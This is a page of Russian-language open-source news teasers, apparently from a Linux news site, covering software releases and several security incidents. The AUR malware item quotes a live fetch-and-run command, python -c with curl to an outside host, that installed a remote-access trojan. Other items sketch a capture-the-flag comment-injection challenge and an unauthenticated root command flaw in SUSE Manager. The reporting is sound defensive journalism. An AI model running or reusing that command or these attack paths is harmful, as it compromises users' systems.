Один из участников соревнования UIUCTF 2025, подробно разобрал, как ему удалось выполнить задание, требующее добиться выполнения своего кода на сервере, имея лишь возможность изменения содержимого текста комментария в коде. Участники могли отправить сетевой запрос к Python-скрипту, который создавал новый Python-скрипт cо случайными именем, добавлял поступившие от пользователя данные в текст комментария, вырезав символы «n» и «r», и запускал этот скрипт командой «python3 имя.py». Контролируя только содержимое комментария участник должен был извлечь строку из файла «/home/ctfuser/flag». Скрипт создавался следующим кодом: comment = input(«› «).replace(«n», «»).replace(«r», «») code = f»»»print(«hello world!») # This is a comment. Here’s another: # {comment} print(«Thanks for … Читать далее Достижение выполнения кода при контроле над текстом комментария в Python-скрипте

Опубликован релиз проекта FEX 2508, развивающего эмулятор для выполнения игр и приложений, собранных для архитектур x86 и x86-64, в Linux-окружении на системах с процессорами ARM64 (AArch64). Эмулятор FEX применяется проектом Asahi для запуска на системах с ARM-чипами Apple Silicon игр из каталога Steam, собранных для архитектуры x86_64. Код проекта написан на языке С++ с ассемблерными вставками и распространяется под лицензией MIT. Библиотеки, необходимые для запуска x86-приложений в ARM64-окружении, подключаются в форме overlay-прослойки с образом корневой ФС (rootfs), поставляемой в формате SquashFS. Подобная прослойка даёт возможность обойтись без создания отдельного chroot-окружения. Загрузка уже сформированных проектом образов rootfs производится утилитой FEXRootFSFetcher. Для … Читать далее Выпуск эмулятора FEX 2508, позволяющего запускать x86-программы на системах ARM64

Нейт Грэм (Nate Graham), разработчик, занимающийся контролем качества в проекте KDE, опубликовал очередной отчёт о разработке KDE. Среди недавних изменений в кодовой базе, формирующей будущий релиз KDE Plasma 6.5, намеченный на 16 октября: Добавлена поддержка автоматического переключения в ночное время на отдельно выбранную тёмную тему оформления. В конфирутаторе предоставлена возможность выбора глобальных тем оформления, которые будут доступны для переключения на странице быстрого изменения настроек (Quick Settings). На страницу быстрого изменения настроек также добавлена опция для автоматического переключения между дневной и ночной темами. Добавлена настройка для показа только светлых или только тёмных вариантов обоев рабочего стола. Также предоставлены опции для включения … Читать далее В KDE появилось автоматическое переключение между дневными и ночными темами оформления

Опубликован стабильный релиз интерфейса для упрощения настройки параметров сети — NetworkManager 1.54.0. Плагины для поддержки VPN (Libreswan, OpenConnect, Openswan, SSTP и др.) развиваются в рамках собственных циклов разработки. Основные новшества NetworkManager 1.54: Добавлена возможность прикреплять отдельные настройки перенаправления пакетов IPv4 к устройствам, используя опцию «ipv4.forwarding». Добавлена настройка «prefix-delegation», позволяющая использовать свойство «subnet-id» для выбора подсети на нижестоящем сетевом интерфейсе при использовании делегирования префиксов IPv6. В утилите nm-cloud-setup реализована поддержка настройки сетевых интерфейсов на baremetal-серверах в OCI (Oracle Cloud Infrastructure). При активации соединений на базе VPN WireGuard реализовано добавление правил в пакетный фильтр, исключающих отбрасывание входящих пакетов ядром из-за rp_filter (Reverse … Читать далее Релиз сетевого конфигуратора NetworkManager 1.54.0

Компания Mozilla сообщила о выявлении фишинг-атаки на разработчиков дополнений к Firefox. Как и в случае недавних атак на сопровождающих пакеты в репозиториях PyPI и NPM, участники каталога дополнений AMO (addons.mozilla.org) стали получать письма, стилизованные под уведомления от Mozilla и информирующие о необходимости обновления информации в профиле для продолжения доступа к возможностям каталога. Ссылки на форму входа в письме вели на подставной сайт, проксирующий запросы к основному каталогу addons.mozilla.org. Отмечается, что корректными доменами для сервисов Mozilla являются только mozilla.org и firefox.com, на любых других доменах учётные данные вводить не следует. Фишинговый домен не уточняется, но получившие письмо разработчики упоминают использование в … Читать далее Mozilla предупредила о фишинг-атаке на разработчиков дополнений к Firefox

В репозитории AUR (Arch User Repository), применяемом в Arch Linux для распространения пакетов от сторонних разработчиков, продолжилась публикация вредоносного кода, интегрированного в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад вредоносным пакетам firefox-patch-bin, librewolf-fix-bin и zen-browser-patched-bin, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе. В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда ‘python -c «$(curl https://segs.lol/9wUb1Z)»‘, загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и … Читать далее В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов

Продолжается развитие проекта FPDoom, который позволяет запустить классический Doom, его дополнения и другие портированные игры на очень распространённом на дешёвых кнопочных телефонах чипе Spreadtrum SC6531 и его модификациях. Чипсету более десяти лет, но телефоны на нём выпускаются до сих пор. В списке протестированных присутствуют 62 модели телефонов. Поддерживаются даже телефоны с монохромном экраном и разрешением 128×64, 96×68 и 64×48 пикселей. С прошлой новости вышло три обновления: 1.20241116: портирован Snes9x — эмулятор SNES. За счёт использования виртуальной памяти можно загружать игры, чей ROM больше памяти телефона (реализовано как маппинг памяти в операционных системах). 1.20250615: портирован Chocolate Doom (в который входят игры … Читать далее Выпуск проекта FPDoom 1.20250728, развивающего порты Doom и других игр для кнопочных телефонов

Швейцарская компания Proton AG, развивающая сервисы Proton Mail, Proton Drive и Proton VPN, представила открытое приложение Proton Authenticator, предназначенное для аутентификации при помощи одноразовых паролей с ограниченным сроком действия, генерируемых при помощи алгоритма TOTP (Time-based One-Time Password). Proton Authenticator может применяться как более функциональная замена проприетарным аутентификаторам, таким как Google Authenticator, Microsoft Authenticator, Authy и Duo, а также в качестве альтернативы открытым проектам FreeOTP и oathtool. Код Proton Authenticator распространяется под лицензией GPLv3. Доступны как мобильные приложения для Android и iOS, так и настольные программы для Linux, macOS и Windows. При разработке в зависимости от платформы применяются языки Kotlin, Swift … Читать далее Представлен Proton Authenticator, генератор одноразовых паролей для двухфакторной аутентификации

Проект KDE начал публикацию тестовых сборок собственного дистрибутива KDE Linux — KDE Linux Testing Edition, а также разместил на основном сайте kde.org страницу, посвящённую дистрибутиву. Для установки доступны системные образы (5.2 ГБ) для создания загрузочных USB-накопителей, работающих в Live-режиме. KDE Linux позиционируется как эталонная реализация Linux-дистрибутива для рабочего стола и приложений KDE, оптимально сочетаемая с технологиями KDE и развиваемая без посредников разработчиками KDE. Редакция KDE Linux Testing Edition основывается на master-ветке в Git и рассчитана на тестирование, контроль качества и отслеживание процесса разработки. Сборки будут обновляться ежедневно и отражать текущее состояние разработки компонентов проекта. Основной целевой аудиторией KDE Linux Testing … Читать далее Проект KDE опубликовал дистрибутив KDE Linux Testing Edition

Доступен выпуск 4MLinux 49.0, минималистичного пользовательского дистрибутива, не являющегося ответвлением от других проектов и использующего графическое окружение на базе оконного менеджера JWM. 4MLinux может использоваться как в роли Live-окружения для воспроизведения мультимедийных файлов и решения пользовательских задач, так и в качестве системы для восстановления после сбоев и платформы для запуска мини-серверов. Для загрузки подготовлены live-образ (x86_64, 1.7 ГБ) с графическим окружением и урезанная консольная сборка (x86_64, 16.2 МБ). В новой версии: Обновлены версии пакетов: ядро Linux 6.12.39, BusyBox 1.37.0, Mesa 25.1.0, Wine 10.11, Perl 5.40.2, Python 2.7.18, Python 3.13.3, Ruby 3.4.3. Обновлены пользовательские приложения: LibreOffice 25.2, AbiWord 3.0.6, GIMP 3.1.2, … Читать далее Выпуск дистрибутива 4MLinux 49.0

Раскрыта информация о жертвах фишинга, о котором на днях предупреждали администраторы репозитория Python-пакетов PyPI (Python Package Index). В результате рассылки сообщений с уведомлением о необходимости подтвердить свой email, которые ссылались на поддельный сайт pypj.org (буква «j» вместо «i»), удалось захватить учётные записи 4 сопровождающих. В итоге злоумышленниками были сгенерированы два токена для доступа к API и опубликовано два релиза проекта num2words (0.5.15 и 0.5.16), содержащих вредоносный код. Модуль num2words, который имеет более 3 млн загрузок в месяц, предоставляет функции для преобразования чисел в текстовое представление. Вредоносные релизы num2words были удалены администраторами PyPI через час после публикации. Для обхода защиты учётной … Читать далее Перехвачены 4 учётные записи в PyPI и выпущены вредоносные релизы num2words

Компания Mozilla China объявила о сворачивании предоставляемых в Китае сервисов для пользователей Firefox. С 27 июля остановлена регистрация в китайских вариантах сервисов Firefox Accounts (accounts.firefox.com.cn) и Firefox Community, а также заблокирована возможность публикации сообщений и комментариев в форуме. С 29 сентября сайт firefox.com.cn, форум (mozilla.com.cn), домашняя страница (home.firefoxchina.cn), ресурсы для загрузки и обновления версии Firefox для Китая, а также сервисы для поддержания учётных записей и синхронизации настроек (Firefox Sync) прекратят работу. Для установки Firefox китайским пользователям предложено использовать основные страницы загрузки от компании Mozilla. Для пользователей китайского варианта Firefox Accounts предоставлена возможность экспорта резервной копии данных. Поддержка пользователей и сопровождение … Читать далее Mozilla China прекращает предоставление сервисов для Firefox в Китае

В инструментарии SUSE Manager, предназначенном для централизованного управления IT-инфраструктурой, в которой используются различные дистрибутивы Linux, выявлена уязвимость (CVE-2025-46811), позволяющая без аутентификации выполнять команды на любых системах, обслуживаемых через SUSE Manager. Команды выполняются с правами root, что позволяет получить полный контроль над всей инфраструктурой. Проблеме присвоен критический уровень опасности (9.3 из 10). Уязвимость вызвана наличием обработчика, принимающем команды через протокол WebSocket (вызов «/rhn/websocket/minion/remote-commands»), не ограничивая при этом доступ. Любой пользователь, имеющий возможность отправки пакетов на сетевой порт 443 на сервере с SUSE Manager, может выполнить произвольные команды с правам root на всех системах, управляемых через SUSE Manager. Для обращения без аутентификации … Читать далее Уязвимость в SUSE Manager, позволяющая выполнять root-операции без аутентификации

Компания Vivo, занимающая около 10% мирового рынка смартфонов (5 место среди производителей смартфонов), представила первый официальный открытый релиз ядра операционной системы BlueOS (Blue River OS). Операционная система BlueOS развивается с 2018 года и уже используется в умных часах серии Vivo Watch. Vivo также работает над применением BlueOS в умных очках, роботах, умных терминалах и потребительских AI-устройствах. Код ядра написан на языке Rust и открыт под лицензией Apache 2.0. На Rust также написаны системные фреймворки BlueOS. Операционная система BlueOS изначально развивается с оглядкой на обеспечение безопасности и использует язык Rust для предотвращения появления уязвимостей, вызванных ошибками при работе с памятью, которые … Читать далее Компания Vivo открыла код ядра BlueOS, написанного на языке Rust

Администраторы репозитория Python-пакетов PyPI (Python Package Index) предупредили о выявлении фишинг-атаки, напоминающей недавнюю атаку на сопровождающих пакеты в репозитории NPM. Злоумышленники рассылали сообщения от имени PyPI с уведомлением о необходимости подтвердить свой email. Сообщения отправлялись с адреса «noreply@pypj.org» и содержали ссылку на форму верификации email, ведущую на сайт pypj.org (от официального сайта pypi.org домен отличается буквой «j» вместо «i» с расчётом на невнимательность получателя). Содержимое сайта pypj.org повторяло сайт pypi.org. Пока нет сведений, удалось ли атакующим получить контроль над какими-либо проектами в PyPI. В ходе похожей атаки на NPM злоумышленники подобным образом обманули сопровождающих нескольких крупных JavaScript-проектов и выпустили обновления … Читать далее Фишинг-атака на сопровождающих Python-пакеты в репозитории PyPI

В коллекцию портов OpenBSD добавлена классическая среда рабочего стола CDE (Common Desktop Environment), разработанная в начале девяностых годов прошлого века совместными усилиями компаний Sun Microsystems, HP, IBM, DEC, SCO, Fujitsu и Hitachi, и на протяжении многих лет поставляемая в качестве штатного графического окружения Solaris, HP-UX, IBM AIX, Digital UNIX и UnixWare. В 2012 году код CDE 2.1 был открыт консорциумом The Open Group под лицензией LGPL. В состав входит XDMCP-совместимый менеджер входа, менеджер пользовательских сеансов, оконный менеджер, панель CDE FrontPanel, менеджер рабочего стола, шина для обеспечения межпроцессного взаимодействия, инструментарий для рабочего стола, средства для разработки приложений на shell и Cи, … Читать далее Для OpenBSD подготовлен порт с классической средой рабочего стола CDE

Кристиан Шаллер (Christian Schaller), возглавляющий Fedora Desktop Team и группу по развитию десктоп-систем в компании Red Hat, опубликовал результаты оценки пригодности применения больших языковых моделей в процессе разработки графических приложений для Linux. В качестве эксперимента он воспользовался AI-ассистентом Claude для перевода устаревшего графического приложения Xtraceroute на актуальные технологии. Приложение Xtraceroute, визуализирующее путь сетевых пакетов на 3D-глобусе, изначально было написано с использованием GTK1 и OpenGL, и в начале 2000-х готов было портировано на GTK2, после чего 20 лет не обновлялось. Благодаря применению AI-ассистента, Кристиану потребовалось около пяти часов для портирования данного приложения на GTK4 и графический API Vulkan. Было: Стало: Затем … Читать далее Эксперимент по использованию AI для перевода приложения с GTK2 и OpenGL на GTK4 и Vulkan

Компания Collabora объявила о реализации в Vulkan-драйвере PanVK поддержки графического API Vulkan 1.4 для устройств с GPU ARM на базе архитектуры V10, таких как Mali-G610 и Mali-G310. Изменения включены в кодовую базу Mesa и будут предложены пользователям в выпуске Mesa 25.2, находящемся на стадии кандидата в релизы. В текущем стабильном выпуске Mesa 25.1 в PanVK поддерживается лишь версия Vulkan 1.2. Из планов по дальнейшему развитию драйвера PanVK упоминается сертификация поддержки Vulkan 1.4 в консорциуме Khronos, проведение оптимизации производительности DDK при выполнении типовых задач, улучшение совместимости с существующими приложениями и реализация поддержки дополнительных расширений Vulkan. Отдельно отмечается намерение повысить производительность для … Читать далее В драйвер PanVK добавлена поддержка Vulkan 1.4

Компания Canonical уволила Тилля Кампетера (Till Kamppeter), лидера проекта OpenPrinting, развивающего компоненты для обеспечения вывода на печать в Linux и с 2021 года взявшего на себя сопровождение сервера печати CUPS, после того как компания Apple потеряла интерес к проекту. Тилль является сооснователем OpenPrinting и занимается сопровождением проекта с момента его создания в 2001 году. С 2006 года Тилль был трудоустроен в компании Canonical, в которой он занимался развитием системы печати для Linux. Компания Canonical не прокомментировала увольнение, но предполагается, что увольнение связано с сокращением удалённо работающих сотрудников или занятием внешним проектом. По словам Тилля он получил сообщения от более 30 … Читать далее Лидера проекта OpenPrinting уволили из Canonical

После шести месяцев разработки опубликован релиз системной библиотеки GNU C Library 2.42 (glibc), которая полностью следует требованиям стандартов ISO C23 и POSIX.1-2024. В создании нового выпуска приняли участие 70 разработчиков. Из реализованных в Glibc 2.42 улучшений можно отметить: В функцию pthread_create добавлена поддержка легковесных сторожевых страниц для защиты стека (stack guard page), обращение к которым вызывает исключение и аварийное завершение процесса (SIGSEGV). Реализация основана на появившемся в системном вызове madvise флаге MADV_GUARD_INSTALL, поддерживаемом начиная с ядра Linux 6.13. По сравнению с маппингом в режиме PROT_NONE сторожевые страницы позволяют более эффективно блокировать выполнение кода за пределами выделенной области памяти, так как … Читать далее Выпуск системной библиотеки Glibc 2.42 и набора утилит GNU Binutils 2.45

После двух месяцев разработки Линус Торвальдс представил релиз ядра Linux 6.16. Среди наиболее заметных изменений: драйвер для ускорения OpenVPN, механизм Kexec HandOver, включение по умолчанию пятиуровневых таблицы страниц памяти для x86, удаление протокола DCCP, блочный драйвер zloop, возможность отправки core-дампов через UNIX-сокет, поддержка атомарной записи в XFS, offload-обработка звука для USB-устройств, оптимизации в Ext4, виртуальный драйвер TPM (Trusted Platform Module), полноценная реализация Device Memory TCP, поддержка неименованных каналов в io_uring, подготовка к интеграции DRM-драйвера Asahi, механизм «usermode queue» в драйвере AMDGPU, поддержка Intel TDE (Trusted Domain Extensions) и Intel APE (Advanced Performance Extensions). В новую версию принято 15924 исправлений от … Читать далее Релиз ядра Linux 6.16